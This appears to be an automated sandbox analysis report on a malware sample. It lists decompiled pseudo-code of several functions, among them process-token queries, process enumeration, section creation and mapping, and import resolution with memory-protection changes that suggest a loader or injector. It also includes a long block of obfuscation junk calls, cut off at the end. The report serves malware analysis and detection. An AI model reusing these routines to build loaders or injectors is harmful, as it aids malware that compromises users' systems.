Instruction ID: 9088048af64dc2d88f2579357acc28bd14e42fa1ee44cfed63b536e03ba23d5d
Opcode Fuzzy Hash: 16b2914a871020c0606836408bd7d4a5f16db994ccb0dc643be34deebe6c79c1
Instruction Fuzzy Hash: DE3137B1A00209EFDB10DFA9CD88ABEF7F9EF48684B518869E655D3200D770EA119B10

Uniqueness

Uniqueness Score: -1.00%

Function 02F671B9, Relevance: 10.6, APIs: 7, Instructions: 81
nativeCOMMON

Download Yara Rule

C-Code - Quality: 38%

			E02F671B9(char _a4, void* _a8) {
				void* _v8;
				void* _v12;
				char _v16;
				void* _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				void* _v44;
				void** _t33;
				void* _t40;
				void* _t43;
				void** _t44;
				intOrPtr* _t47;
				char _t48;

				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v20 = _a4;
				_t48 = 0;
				_v16 = 0;
				_a4 = 0;
				_v44 = 0x18;
				_v40 = 0;
				_v32 = 0;
				_v36 = 0;
				_v28 = 0;
				_v24 = 0;
				if(NtOpenProcess( &_v12, 0x400,  &_v44,  &_v20) >= 0) {
					_t33 =  &_v8;
					__imp__(_v12, 8, _t33);
					if(_t33 >= 0) {
						_t47 = __imp__;
						 *_t47(_v8, 1, 0, 0,  &_a4, _t43); // executed
						_t44 = E02F658BE(_a4);
						if(_t44 != 0) {
							_t40 =  *_t47(_v8, 1, _t44, _a4,  &_a4); // executed
							if(_t40 >= 0) {
								memcpy(_a8,  *_t44, 0x1c);
								_t48 = 1;
							}
							E02F6147E(_t44);
						}
						NtClose(_v8); // executed
					}
					NtClose(_v12);
				}
				return _t48;
			}

0x02f671c6
0x02f671c7
0x02f671c8
0x02f671c9
0x02f671ca
0x02f671ce
0x02f671d5
0x02f671e4
0x02f671e7
0x02f671ea
0x02f671f1
0x02f671f4
0x02f671f7
0x02f671fa
0x02f671fd
0x02f67208
0x02f6720a
0x02f67213
0x02f6721b
0x02f6721d
0x02f6722f
0x02f67239
0x02f6723d
0x02f6724c
0x02f67250
0x02f67259
0x02f67261
0x02f67261
0x02f67263
0x02f67263
0x02f6726b
0x02f67271
0x02f67275
0x02f67275
0x02f67280

APIs

NtOpenProcess.NTDLL(00000000,00000400,?,?), ref: 02F67200
NtOpenProcessToken.NTDLL(00000000,00000008,?), ref: 02F67213
NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02F6722F

Part of subcall function 02F658BE: RtlAllocateHeap.NTDLL(00000000,-00000008,02F61C51), ref: 02F658CA

NtQueryInformationToken.NTDLL(?,00000001,00000000,00000000,00000000), ref: 02F6724C
memcpy.NTDLL(?,00000000,0000001C), ref: 02F67259
NtClose.NTDLL(?), ref: 02F6726B
NtClose.NTDLL(00000000), ref: 02F67275

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
String ID:
API String ID: 2575439697-0
Opcode ID: ecc7420f7be64774a87c2950595817a23381e4e2cc60a150e7e70da1f5bcd845
Instruction ID: 11e35a279f3eda6843c9670836fdecc9c15901e1ecf008b8927b415f478ba045
Opcode Fuzzy Hash: ecc7420f7be64774a87c2950595817a23381e4e2cc60a150e7e70da1f5bcd845
Instruction Fuzzy Hash: 602119B1A4011CBBDB01AFA5CC89AEEBFBDEF18784F104016FA40A6110D7718A549FA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F656A2, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02F656A2() {
				char _v264;
				void* _v300;
				void* _t5;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t5 = CreateToolhelp32Snapshot(2, 0); // executed
				_t17 = _t5;
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x2f6d2a4; // 0xb3a5a8
						_t2 = _t9 + 0x2f6ee38; // 0x73617661
						_push( &_v264);
						if( *0x2f6d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						FindCloseChangeNotification(_t17); // executed
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x02f656ad
0x02f656b2
0x02f656b7
0x02f656bb
0x02f656c5
0x02f656f6
0x02f656cc
0x02f656d1
0x02f656de
0x02f656e7
0x02f656fe
0x02f656e9
0x02f656f1
0x00000000
0x02f656f1
0x02f656ff
0x02f65700
0x00000000
0x02f65700
0x00000000
0x02f656fa
0x02f65706
0x02f6570b

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02F656B2
Process32First.KERNEL32(00000000,?), ref: 02F656C5
Process32Next.KERNEL32(00000000,?), ref: 02F656F1
FindCloseChangeNotification.KERNELBASE(00000000), ref: 02F65700

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$ChangeCloseCreateFindFirstNextNotificationSnapshotToolhelp32
String ID:
API String ID: 3243318325-0
Opcode ID: 40b609284f1f0ec173e44b3a4853968518c59a99cd1b31b25d7da42e3a1f8ac5
Instruction ID: 2e7700de02cdaf956d17225ca08da42fcc46a32519b872a1e17f0895281fa3ca
Opcode Fuzzy Hash: 40b609284f1f0ec173e44b3a4853968518c59a99cd1b31b25d7da42e3a1f8ac5
Instruction Fuzzy Hash: 2CF0F672A0102C6AD720A6268C0CEFB76ADDB85780F000051EB56E3140EB20D646CEA0

Uniqueness

Uniqueness Score: -1.00%

Function 01511A34, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E01511A34(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E015110BA(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x01511a3d
0x01511a44
0x01511a45
0x01511a46
0x01511a47
0x01511a48
0x01511a59
0x01511a5d
0x01511a71
0x01511a74
0x01511a77
0x01511a7e
0x01511a81
0x01511a88
0x01511a8b
0x01511a8e
0x01511a91
0x01511a96
0x01511ad1
0x01511a98
0x01511a9b
0x01511aa1
0x01511aa6
0x01511aaa
0x01511ac8
0x01511aac
0x01511ab3
0x01511ac1
0x01511ac1
0x01511aaa
0x01511ad9

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,?), ref: 01511A91

Part of subcall function 015110BA: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 015110E7

memset.NTDLL ref: 01511AB3

Strings

@, xrefs: 01511A81

Memory Dump Source

Source File: 00000000.00000002.457064738.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true

Associated: 00000000.00000002.457074162.0000000001515000.00000040.00000001.sdmp Download File
Associated: 00000000.00000002.457082559.0000000001517000.00000040.00000001.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: f77f55ab3ccb546c3d8c576f84e5351407dfacedabb99d7fd493fd0a52462a6f
Instruction ID: 52d7fac85fca9f30e5535e506baabfff28e22ee22ddcd68c641cecf3f9de3f4d
Opcode Fuzzy Hash: f77f55ab3ccb546c3d8c576f84e5351407dfacedabb99d7fd493fd0a52462a6f
Instruction Fuzzy Hash: BA211DB6E00609AFDB11DFA9C8849DEFBF9FF48354F104869E615F7210D7719A448BA0

Uniqueness

Uniqueness Score: -1.00%

Function 02F67B01, Relevance: 3.1, APIs: 2, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E02F67B01(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E02F679B3(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x02f67b0a
0x02f67b11
0x02f67b12
0x02f67b13
0x02f67b14
0x02f67b15
0x02f67b26
0x02f67b2a
0x02f67b3e
0x02f67b41
0x02f67b44
0x02f67b4b
0x02f67b4e
0x02f67b55
0x02f67b58
0x02f67b5b
0x02f67b5e
0x02f67b63
0x02f67b9e
0x02f67b65
0x02f67b68
0x02f67b6e
0x02f67b73
0x02f67b77
0x02f67b95
0x02f67b79
0x02f67b80
0x02f67b8e
0x02f67b8e
0x02f67b77
0x02f67ba6

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,75144EE0,00000000,00000000,02F65897), ref: 02F67B5E

Part of subcall function 02F679B3: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,02F67B73,00000002,00000000,?,?,00000000,?,?,02F67B73,00000000), ref: 02F679E0

memset.NTDLL ref: 02F67B80

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: Section$CreateViewmemset
String ID:
API String ID: 2533685722-0
Opcode ID: 91966678b29505e05f7b4be54608df420cf02f77df64e8f20947968736829b8d
Instruction ID: 50b6811c55d38b2f9d212718b29f5e62d55d02fe2f6e1b8e73518f84b2d2ca93
Opcode Fuzzy Hash: 91966678b29505e05f7b4be54608df420cf02f77df64e8f20947968736829b8d
Instruction Fuzzy Hash: 5C211DB2D00209AFDB11DFA9C8849EEFBF9EF48354F108469E615F3210D731AA448FA4

Uniqueness

Uniqueness Score: -1.00%

Function 01511ADC, Relevance: 3.1, APIs: 2, Instructions: 66
nativeCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E01511ADC(void* __eax) {
				char _v8;
				void** _v12;
				void* _t17;
				long _t23;
				long _t25;
				long _t28;
				intOrPtr* _t33;
				void* _t34;
				void** _t35;
				intOrPtr _t37;

				_t34 = __eax;
				_t17 = E01511F61( &_v8,  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) + 0x00000fff & 0xfffff000,  &_v8,  &_v12); // executed
				if(_t17 != 0) {
					_t28 = 8;
					goto L8;
				} else {
					_t33 = _v8;
					_t28 = E01511CE4( &_v8, _t33, _t34);
					if(_t28 == 0) {
						_t37 =  *((intOrPtr*)(_t33 + 0x3c)) + _t33;
						_t23 = E015115C2(_t33, _t37); // executed
						_t28 = _t23;
						if(_t28 == 0) {
							_t25 = E01511EB4(_t37, _t33); // executed
							_t28 = _t25;
							if(_t28 == 0) {
								_push(_t25);
								_push(1);
								_push(_t33);
								if( *((intOrPtr*)( *((intOrPtr*)(_t37 + 0x28)) + _t33))() == 0) {
									_t28 = GetLastError();
								}
							}
						}
					}
					_t35 = _v12;
					_t35[6](NtClose( *_t35));
					E01511938(_t35);
					L8:
					return _t28;
				}
			}

0x01511ae4
0x01511b01
0x01511b08
0x01511b67
0x00000000
0x01511b0a
0x01511b0a
0x01511b14
0x01511b18
0x01511b1d
0x01511b21
0x01511b26
0x01511b2a
0x01511b2f
0x01511b34
0x01511b38
0x01511b3d
0x01511b3e
0x01511b42
0x01511b47
0x01511b4f
0x01511b4f
0x01511b47
0x01511b38
0x01511b2a
0x01511b51
0x01511b5a
0x01511b5e
0x01511b68
0x01511b6e
0x01511b6e

APIs

Part of subcall function 01511F61: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,01511B06,?,?,?,?,00000002,?,0151178F), ref: 01511F86
Part of subcall function 01511F61: GetProcAddress.KERNEL32(00000000,?), ref: 01511FA8
Part of subcall function 01511F61: GetProcAddress.KERNEL32(00000000,?), ref: 01511FBE
Part of subcall function 01511F61: GetProcAddress.KERNEL32(00000000,?), ref: 01511FD4
Part of subcall function 01511F61: GetProcAddress.KERNEL32(00000000,?), ref: 01511FEA
Part of subcall function 01511F61: GetProcAddress.KERNEL32(00000000,?), ref: 01512000

Part of subcall function 01511CE4: memcpy.NTDLL(00000002,?,?,?,?,?,?,?,01511B14,?,?,?,?,?,?,00000002), ref: 01511D1B
Part of subcall function 01511CE4: memcpy.NTDLL(00000002,?,?,?,00000002), ref: 01511D50

NtClose.NTDLL(?,?,?,?,?,?,?,00000002,?,0151178F), ref: 01511B56

Part of subcall function 015115C2: LoadLibraryA.KERNELBASE ref: 015115F8
Part of subcall function 015115C2: lstrlenA.KERNEL32 ref: 0151160E
Part of subcall function 015115C2: memset.NTDLL ref: 01511618
Part of subcall function 015115C2: GetProcAddress.KERNEL32(?,00000002), ref: 0151167B
Part of subcall function 015115C2: lstrlenA.KERNEL32(-00000002), ref: 01511690
Part of subcall function 015115C2: memset.NTDLL ref: 0151169A

Part of subcall function 01511EB4: VirtualProtect.KERNELBASE(00000000,?,00000004,?,?,?,00000000,?,?), ref: 01511EE2
Part of subcall function 01511EB4: VirtualProtect.KERNELBASE(00000000,00000000,00000004,?), ref: 01511F3A
Part of subcall function 01511EB4: GetLastError.KERNEL32 ref: 01511F40

GetLastError.KERNEL32(?,0151178F), ref: 01511B49

Memory Dump Source

Source File: 00000000.00000002.457064738.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true

Associated: 00000000.00000002.457074162.0000000001515000.00000040.00000001.sdmp Download File
Associated: 00000000.00000002.457082559.0000000001517000.00000040.00000001.sdmp Download File

Similarity

API ID: AddressProc$ErrorLastProtectVirtuallstrlenmemcpymemset$CloseHandleLibraryLoadModule
String ID:
API String ID: 2954739140-0
Opcode ID: 5c0fa00c6d351b1023cda8819fdb6da35dfd38eb149fea5a70ca5658e46f5034
Instruction ID: f8b029b1d448825f7efc3383084df52f6e3ec5ac41933beb91a13db570b321be
Opcode Fuzzy Hash: 5c0fa00c6d351b1023cda8819fdb6da35dfd38eb149fea5a70ca5658e46f5034
Instruction Fuzzy Hash: 9E11AC72600B126BE7236BF98CC5DAF77ACBF54654B0101A4EB05DB245FB60ED05C7A4

Uniqueness

Uniqueness Score: -1.00%

Function 015110BA, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E015110BA(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x015110cc
0x015110d2
0x015110e0
0x015110e7
0x015110ec
0x015110f2
0x00000000
0x015110f3
0x00000000

APIs

NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,?,?,00000002,00000000,?), ref: 015110E7

Memory Dump Source

Source File: 00000000.00000002.457064738.0000000001510000.00000040.00000001.sdmp, Offset: 01510000, based on PE: true

Associated: 00000000.00000002.457074162.0000000001515000.00000040.00000001.sdmp Download File
Associated: 00000000.00000002.457082559.0000000001517000.00000040.00000001.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: c5d924d10590382bbf8d3d870ba795c5e83205e0e7cf8ee9a11f5889b2075989
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: DFF01CB6A0060DBFEB119FA5CC85CAFBBBDEB44294B104979B252E5094D6309E088A60

Uniqueness

Uniqueness Score: -1.00%

Function 02F679B3, Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02F679B3(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x02f679c5
0x02f679cb
0x02f679d9
0x02f679e0
0x02f679e5
0x02f679eb
0x00000000
0x02f679ec
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,02F67B73,00000002,00000000,?,?,00000000,?,?,02F67B73,00000000), ref: 02F679E0

Memory Dump Source

Source File: 00000000.00000002.457308148.0000000002F61000.00000020.00000001.sdmp, Offset: 02F60000, based on PE: true

Associated: 00000000.00000002.457297864.0000000002F60000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457322851.0000000002F6C000.00000002.00000001.sdmp Download File
Associated: 00000000.00000002.457332739.0000000002F6D000.00000004.00000001.sdmp Download File
Associated: 00000000.00000002.457343691.0000000002F6F000.00000002.00000001.sdmp Download File

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: e8a58b2884a96ab2a74abb75a3ed017dc50177817090368071c8ac886832d37c
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: BFF019B650020CFFD7119FA5CC85DAFBBFDDB44298B104939B152D1050D6309D488A60

Uniqueness

Uniqueness Score: -1.00%

Function 10013500, Relevance: 4202.9, APIs: 2123, Strings: 276, Instructions: 4665
windowCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E10013500() {
				long _v8;
				CHAR* _v12;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				long _t2518;
				intOrPtr _t2715;

				_v12 = L"Interface\\{b196b287-bab4-101a-b69c-00aa00341d07}";
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
				CharNextA("rlGoyLNdfO");
